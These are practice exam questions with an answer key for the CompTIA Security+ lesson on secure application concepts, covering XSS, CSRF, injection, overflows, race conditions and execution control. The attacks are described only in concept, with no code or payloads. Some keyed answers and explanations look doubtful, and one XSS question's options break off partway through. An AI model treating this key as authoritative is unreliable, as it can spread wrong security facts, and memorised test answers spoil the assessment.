CompTIA Security+ - Lesson 14: Summarizing Secure Application Concepts (Practice Questions)
Which of the following is a common solution that protects an application from behaving in an unexpected way when passing invalid data through an attack? A. Buffer overflow B. Race conditions C. Zero-day exploit D. Input Validation
Input Validation Explanation: Input validation is a primary vector for attacking applications. If the application cannot check for valid inputs, a hacker can take advantage of this vulnerability to enter in commands that can query a database, for example, and obtain confidential data.
A threat analyst is asked about malicious code indicators. Which indicator allows the threat actor's backdoor to restart if the host reboots or the user logs off? A. Persistence B. Credential dumping C. Shellcode D. Lateral movement/inside attacker
Persistence Explanation: Persistence is when a mechanism allows the threat actor's backdoor to restart if the host reboots or the user logs off. Typical methods are to use AutoRun keys in the registry or adding a scheduled task.
Which scripting language is the preferred method of performing Windows administration tasks? A .Javascript B. Python C. Ruby D. Powershell
PowerShell Explanation: Powershell is the preferred method of performing Windows administration tasks.
Which malicious code indicator is a minimal program designed to exploit a buffer overflow? A. Credential dumping B. Persistence C. Lateral movement/insider attack D. Shellcode
Shellcode Explanation: Shellcode is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges, or to drop a backdoor on the host if run as a Trojan.
Which scenario best describes provisioning? A. A developer removes an application from packages or instances. B. A developer deploys an application to the target environment. C. A developer sets up ID system for each iteration of a software product. D. A developer commits and tests updates.
A developer deploys an application to the target environment. Explanation: Provisioning is the process of deploying an application to the target environment. An enterprise provisioning manager might assemble multiple applications in a package.
Analyze types of vulnerabilities and summarize a zero-day exploit. A. A design flaw that can cause the application security system to be circumvented. B. A vulnerability that is capitalized on before the developer knows about it. C. An attack that passes invalid data to an application. D. An attack that passes data to deliberately overflow the buffer, that the application reserves to store the expected data.
A vulnerability that is capitalized on before the developer knows about it. Explanation: A zero-day exploit is a vulnerability that is exploited before the developer knows about it or can release a patch to address it. These can be extremely destructive as it can take the vendor a lot of time to develop a patch.
A system administrator is working to restore a system affected by a stack overflow. Analyze the given choices and determine which overflow vulnerability the attacker exploited. A. An attacker changes the return address of an area of memory used by a program subroutine. B. An attacker overwrites an area of memory allocated by an application to store variables. C. An attacker exploits unsecure code with more values than an array expects. D. An attacker causes the target software to calculate a value that exceeds the set bounds.
An attacker changes the return address of an area of memory used by a program subroutine. Explanation: A stack is an area of memory used by a program subroutine. It includes a return address, which is the location of the program that is called the subroutine. An attacker could use a buffer overflow to change the return address, which is called a stack overflow.
Code developers de-conflict coding with one another during which phase of the software development life cycle (SDLC)? A. Continuous integration B. Continuous delivery C. Continuous validation D. Continuous monitoring
Continuous integration Explanation: Continuous integration (CI) is the principle that developers should commit and test updates often. CI aims to detect and resolve coding conflicts early.
Which type of attack disguises the nature of malicious input, preventing normalization from stripping illegal characters? A. Fuzzing B. Canonicalization C. Code reuse D. Code signing
Canonicalization Explanation: The threat actor might use a canonicalization attack to disguise the nature of the malicious input. Canonicalization refers to the way the server converts between the different methods by which a resource (such as a file path or URL) may be represented and submitted to the simplest (or canonical) method used by the server to process the input.
Which method might an attacker use to redirect login attempts via information gained by implementing JavaScript on a webpage the user believes is legitimate? A. Man-in-the-Browser (MitB) B. Confused deputy C. Reflected D. Clickjacking
Clickjacking Explanation: Clickjacking is an attack characterized as a difference between what a user sees and trusts as a web application with a login page or form, and the reality of the page or form containing a malicious layer or invisible iFrame, allowing an attacker to intercept or redirect user input.
Which of the following statements differentiates between input validation and output encoding? A. Input validation ensures that data input into an application is in a compatible format for the application, while output encoding re-encodes data that transfers between scripts. B. Input validation is a server-side validation method, while output encoding is a client-side validation method. C. Output encoding is a server-side validation method, while input validation encoding is a client-side validation method. D. Input validation forces the browser to connect using HTTPS only, while output encoding sets whether the browser can cache responses.
Input validation ensures that data input into an application is in a compatible format for the application, while output encoding re-encodes data that transfers between scripts. Explanation: Input validation ensures that an application can appropriately handle the data entered into a field or variable in the application. Output encoding occurs when a script passes data to another script. Output encoding ensures it is not passing any malicious "script" contents.
A hacker compromises a web browser and uses access to harvest credentials users input when logging in to banking websites. What type of attack has occurred? A. Evil twin B. Man-in-the-Browser C. Session hijacking D. Clickjacking
Man-in-the-Browser Explanation: A man-in-the-browser (MitB) attack compromises the web browser. An attacker may be able to inspect session cookies, certificates, and data, change browser settings, perform redirection, and inject code.
A network user calls the help desk after receiving an error message. The caller complains that the error message does not indicate whether the username or password input was incorrect but simply states there was an authentication error. What does this situation illustrate? A. Minimizing data exposure B. Dynamic code analysis C. Effective exception handling D. Web application validation
Minimizing data exposure Explanation: Data exposure is a fault that allows privileged information (such as a token, password, or personal data) to be read without being subject to the appropriate access controls.
Identify the type of attack that occurs when the outcome from execution process are directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer. A. Stack overflow B. Integer overflow C. Race conditions D. Dynamic Link Library (DLL) injection
Race conditions Explanation: Race conditions occur when the outcome from executive processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.
A security analyst is assessing the security of their company's web application. They have determined multiple occurrences of XSS attacks and need to identify what type of XSS attacks occurred in order to apply the proper remediation. Which of the following accurately distinguishes between Reflected XSS, Stored XSS, and DOM XSS attacks? A. Reflected XSS attacks exploit client-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in client-side scripts by storing malicious code in a database. DOM XSS attacks exploit vulnerabilities in server-side scripts by manipulating the Document Object Model (DOM). B. Reflected XSS attacks exploit server-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in server-side scripts by storing malicious code in a database. DOM XSS attacks exploit vulnerabilities in client-side scripts by manipulating the Document Object Model (DOM). C. Reflected XSS attacks exploit client-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in server-side scripts
Reflected XSS attacks exploit server-side scripts by capturing user input and reflecting it back to the client, while Stored XSS attacks exploit vulnerabilities in server-side scripts by storing malicious code in a database. DOM XSS attacks exploit vulnerabilities in client-side scripts by manipulating the Document Object Model (DOM). Explanation: There are three types of XSS attacks - Reflected XSS attacks exploit server-side scripts by capturing user input and reflecting it back to the client, Stored XSS attacks exploit vulnerabilities in server-side scripts by storing malicious code in a database, and DOM XSS attacks exploit vulnerabilities in client-side scripts by manipulating the Document Object Model (DOM).
Evaluate the Agile paradigm within a Software Development Lifecycle (SDLC) to determine which statement demonstrates the idea of continuous tasks. A. Devising an application's initial scope and vision for the project B. Prioritizing the requirements and work through the cycles of designing, developing, and testing C. Releasing well-tested code in smaller blocks D. Perform the final integration and testing of the solution
Releasing well-tested code in smaller blocks Explanation: Agile development flips the waterfall model by iterating through phases concurrently on smaller modules of code. In this model, development and provisioning tasks are conceived as continuous.
An attacker compromises a Linux host, installing a web shell as a backdoor. If the attacker gained access to the host through a connection the host established, what type of attack has occurred? A. Man-in-the-Browser (MitB) B. Reverse shell C. Rootkit D. Session hijacking
Reverse shell Explanation: A reverse shell is a common attack vector against a Linux host, where a victim host opens a connection to the attacking host through a maliciously spawned remote command shell.
Which cookie attribute can a security admin configure to help mitigate a request forgery attack? A. Secure B. HttpOnly C. SameSite D. Cache-Control
SameSite Explanation: Cookies can be a vector for session hijacking and data exposure if not configured correctly. Use the SameSite attribute to control where a cookie may be sent, mitigating request forgery attacks.
A system administrator suspects a memory leak is occurring on a client. Determine which scenario would justify this finding. A. A rapid decrease in disk space has been logged. B. High page file utilization has been logged. C. High memory utilization during scheduled backups after-hours. D. Software does not release allocated memory when it is done with it.
Software does not release allocated memory when it is done with it. Explanation: A memory leak is a process that takes up memory without subsequently freeing it up, which a worm or other type of malware can cause. Looking for decreasing available bytes and increasing committed bytes can detect this type of memory leak.
An attacker finds a way to exploit a vulnerability in a target application that allows the attacker to bypass a password requirement. Which method did the attacker most likely use? A. The attacker added LDAP filters as unsanitized input by creating a condition that is always true. B. The attacker inserted code into a back-end database by submitting a post to a bulletin board with a malicious script embedded in the message. C. The attacker embedded a request for a local resource via XML with no encryption. D. The attacker modified a basic SQL function, adding code to some input that an app accepts, causing it to execute the attacker's query.
The attacker added LDAP filters as unsanitized input by creating a condition that is always true. Explanation: An attacker could exploit the vulnerability with an LDAP injection attack, inserting the (&) operator to return a condition that is always true, dropping the password filter for a name=value pair.
A threat actor programs an attack designed to invalidate memory locations to crash target systems. Which statement best describes the nature of this attack? A. The attacker created a null pointer file to conduct a dereferencing attack. B. The attacker programmed a dereferencing attack. C. The attacker programmed a null pointer dereferencing exception. D. The attacker created a race condition to perform a null pointer dereferencing attack.
The attacker programmed a null pointer dereferencing exception. Explanation: Dereferencing occurs when a pointer variable stores a memory location, which is attempting to read or write that memory address via the pointer. If the memory location is invalid or null, this creates a null pointer dereference type of exception and the process may crash.
An employee is attempting to install new software they believe will help them perform their duties faster. When the employee tries to install the software, an error message is received, stating they are not authorized to install the software. The employee calls the help desk for assistance. Evaluate the principles of execution control to conclude what has most likely occurred in this scenario. A. The company is utilizing allow list control, and the software is included in the list. B. The software is malicious, and execution control has identified the virus and is blocking the installation. C. The company is utilizing allow list control, and the software is not included in the list. D. The company is utilizing block list control, and the software is not included in the list.
The company is utilizing allow list control, and the software is not included in the list. Explanation: It is likely that the company is using allow list control, and the software is not on the approved allow list. Any software not listed will be blocked from running. If the company was using a block list, the software would be able to run as long as it is not on the prohibited list. Block list only blocks software that has been listed.
A software developer is seeking ways to streamline the coding process securely. Which of the following is true of secure code usage? A. Code reuse is a risk-free approach B. Stored procedures are a less-secure method of querying a database C. Software development kits (SDK) contain code that can be trusted D. Third-party libraries must be monitored for vulnerabilities
Third-party libraries must be monitored for vulnerabilities Explanation: Third-party library refers to using a binary package (such as a dynamic link library) that implements some sort of standard functionality, such as establishing a network connection or performing cryptography. Each library must be monitored for vulnerabilities and patched promptly.
Analyze the following statements and select the statement which correctly explains the difference between cross-site scripting (XSS) and cross-site request forgery (XSRF). A. XSRF spoofs a specific request against the web application, while XSS is a means of running any arbitrary code. B. XSS is not an attack vector, but the means by which an attacker can perform XSRF, the attack vector. C. XSRF requires a user to click an embedded malicious link, whereas the attacker embeds an XSS attack in the document object module (DOM) script. D. XSRF is a server-side exploit, while XSS is a client-side exploit.
XSRF spoofs a specific request against the web application, while XSS is a means of running any arbitrary code. Explanation: A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users and track sessions. XSS exploits a browser's trust and can perform an XSRF attack.
Which of the following is NOT a scripting language? A. regex B. PowerShell C. JavaScript D. Python
regex Explanation: Automated or procedural scripting languages take standard arguments as data, so there is less scope for uncertainty over configuration choices leading to errors. A domain-specific language (DSL) performs a particular task, such as regex string parsing.
